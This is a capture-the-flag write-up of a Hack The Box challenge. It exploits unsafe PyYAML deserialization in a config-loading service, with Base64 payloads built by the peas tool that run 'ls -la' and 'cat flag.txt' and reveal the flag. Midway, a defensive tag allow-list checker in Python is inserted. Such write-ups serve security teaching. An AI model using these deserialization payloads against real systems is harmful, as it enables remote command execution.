Hijack
We are given a remote instance to connect to:
$ nc 167.71.143.44 31614
<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
>
Basic reconnaissance
There are two options. Using the first one, we can set up a configuration, and the output is a Base64-encoded string:
$ nc 165.232.100.46 31251
<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> 1
- Creating new config -
Temperature units (F/C/K): C
Propulsion Components Target Temperature : 13
Solar Array Target Temperature : 37
Infrared Spectrometers Target Temperature : 0
Auto Calibration (ON/OFF) : ON
Serialized config: ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICcwJywgYXV0b19jYWxpYnJhdGlvbjogJ09OJywKICBwcm9wdWxzaW9uX3RlbXA6ICcxMycsIHNvbGFyX2FycmF5X3RlbXA6ICczNycsIHVuaXRzOiBDfQo=
Uploading to ship...
If we decode this string, we see that it is a serialized object:
$ echo ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICcwJywgYXV0b19jYWxpYnJhdGlvbjogJ09OJywKICBwcm9wdWxzaW9uX3RlbXA6ICcxMycsIHNvbGFyX2FycmF5X3RlbXA6ICczNycsIHVuaXRzOiBDfQo= | base64 -d
!!python/object:__main__.Config {IR_spectrometer_temp: '0', auto_calibration: 'ON',
propulsion_temp: '13', solar_array_temp: '37', units: C}
$ echo ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICcwJywgYXV0b19jYWxpYnJhdGlvbjogJ09OJywKICBwcm9wdWxzaW9uX3RlbXA6ICcxMycsIHNvbGFyX2FycmF5X3RlbXA6ICczNycsIHVuaXRzOiBDfQo= | base64 -d | xxd
00000000: 2121 7079 7468 6f6e 2f6f 626a 6563 743a !!python/object:
00000010: 5f5f 6d61 696e 5f5f 2e43 6f6e 6669 6720 __main__.Config
00000020: 7b49 525f 7370 6563 7472 6f6d 6574 6572 {IR_spectrometer
00000030: 5f74 656d 703a 2027 3027 2c20 6175 746f _temp: '0', auto
00000040: 5f63 616c 6962 7261 7469 6f6e 3a20 274f _calibration: 'O
00000050: 4e27 2c0a 2020 7072 6f70 756c 7369 6f6e N',. propulsion
00000060: 5f74 656d 703a 2027 3133 272c 2073 6f6c _temp: '13', sol
00000070: 6172 5f61 7272 6179 5f74 656d 703a 2027 ar_array_temp: '
00000080: 3337 272c 2075 6e69 7473 3a20 437d 0a 37', units: C}.
Also, with a bit of searching, we can identify the serialization format as YAML.
Deserialization attack
PyYAML is known to be unsafe when it deserializes untrusted data, which must be what option 2 does.
There is a public project called python-deserialization-attack-payload-generator that lets us generate payloads for exploiting insecure deserialization vulnerabilities in Python (more information on HackTricks):
$ cd python-deserialization-attack-payload-generator
$ python3 peas.py
Enter RCE command :ls -la
Enter operating system of target [linux/windows] . Default is linux :
Want to base64 encode payload ? [N/y] :y
Enter File location and name to save :./payload
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :PyYAML
Done Saving file !!!!
$ cat payload_yaml
ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gbHMKICAtIC1sYQo=
Let's try it:
$ nc 165.232.100.46 31251
<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> 2
Serialized config to load: ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gbHMKICAtIC1sYQo=
** Success **
Uploading to ship...
<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> total 20
drwxr-sr-x 1 ctf ctf 4096 Mar 10 20:10 .
drwxr-xr-x 1 root root 4096 Mar 10 20:10 ..
-rw-rw-r-- 1 root root 1583 Mar 10 20:08 chall.py
-rw-rw-r-- 1 root root 49 Mar 10 20:08 flag.txt
-rwxrwxr-x 1 root root 1583 Mar 10 20:08 hijack.py
Great!
Flag
Let's go for the flag:
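From the defender's side, the root cause is that option 2 hands an attacker-controlled Base64 string to a PyYAML loader that honours !!python/ tags. As an added example (not code from the challenge or from the peas tool), here is a stdlib-only pre-check that decodes the string and allow-lists the single tag the Config format legitimately uses, rejecting anything else before yaml.load() ever sees it; the names ALLOWED_TAGS and vet_serialized_config are my own, and the two sample strings are the ones from the sessions above.

```python
from __future__ import annotations

import base64
import binascii
import re

# The only tag the TCS "Create config" output ever emits. Every other tag,
# in particular the !!python/ family (object/apply, object/new, name,
# module, ...), lets yaml.load() call arbitrary Python, so it is rejected
# before the string reaches the parser.
ALLOWED_TAGS = {"!!python/object:__main__.Config"}

# Matches an explicit YAML tag token: !!ns/suffix, !local or !<verbatim>.
# Deliberately broad: a '!' inside an unquoted scalar is flagged too, so
# the check fails closed rather than open.
TAG_RE = re.compile(r"(?<![\w/.:-])!(?:<[^>]*>|!?[\w/.:-]+)")

# Sample inputs taken from the sessions above (test data, not live input).
LEGIT_CONFIG_B64 = "ISFweXRob24vb2JqZWN0Ol9fbWFpbl9fLkNvbmZpZyB7SVJfc3BlY3Ryb21ldGVyX3RlbXA6ICcwJywgYXV0b19jYWxpYnJhdGlvbjogJ09OJywKICBwcm9wdWxzaW9uX3RlbXA6ICcxMycsIHNvbGFyX2FycmF5X3RlbXA6ICczNycsIHVuaXRzOiBDfQo="
PEAS_PAYLOAD_B64 = "ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gbHMKICAtIC1sYQo="


def vet_serialized_config(b64: str) -> tuple[bool, str, str]:
    """Decode a Base64 TCS config and allow-list its YAML tags.

    Returns (ok, reason, yaml_text). On success yaml_text has the allowed
    object tag stripped, so the caller can run it through yaml.safe_load()
    and build Config from the resulting dict instead of via !!python/object.
    """
    try:
        text = base64.b64decode(b64, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError) as exc:
        return False, f"not valid Base64/UTF-8: {exc}", ""
    bad = sorted({t for t in TAG_RE.findall(text) if t not in ALLOWED_TAGS})
    if bad:
        return False, "disallowed YAML tag(s): " + ", ".join(bad), ""
    for tag in ALLOWED_TAGS:
        text = text.replace(tag, "")
    return True, "ok", text.strip()


if __name__ == "__main__":
    for label, blob in (("legit config", LEGIT_CONFIG_B64), ("peas payload", PEAS_PAYLOAD_B64)):
        ok, reason, _ = vet_serialized_config(blob)
        print(f"{label}: {'ACCEPT' if ok else 'REJECT'} ({reason})")
```

Running it accepts the legitimate config and rejects the peas payload on both of its tags; the stripped YAML can then be parsed with yaml.safe_load, which itself refuses any !!python/ tag.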
$ python3 peas.py
Enter RCE command :cat flag.txt
Enter operating system of target [linux/windows] . Default is linux :
Want to base64 encode payload ? [N/y] :y
Enter File location and name to save :payload
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :PyYAML
Done Saving file !!!!
$ cat payload_yaml
ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gY2F0CiAgLSBmbGFnLnR4dAo=
$ nc 165.232.100.46 31251
<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> 2
Serialized config to load: ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0gY2F0CiAgLSBmbGFnLnR4dAo=
** Success **
Uploading to ship...
<------[TCS]------>
[1] Create config
[2] Load config
[3] Exit
> HTB{1s_1t_ju5t_m3_0r_iS_1t_g3tTing_h0t_1n_h3r3?}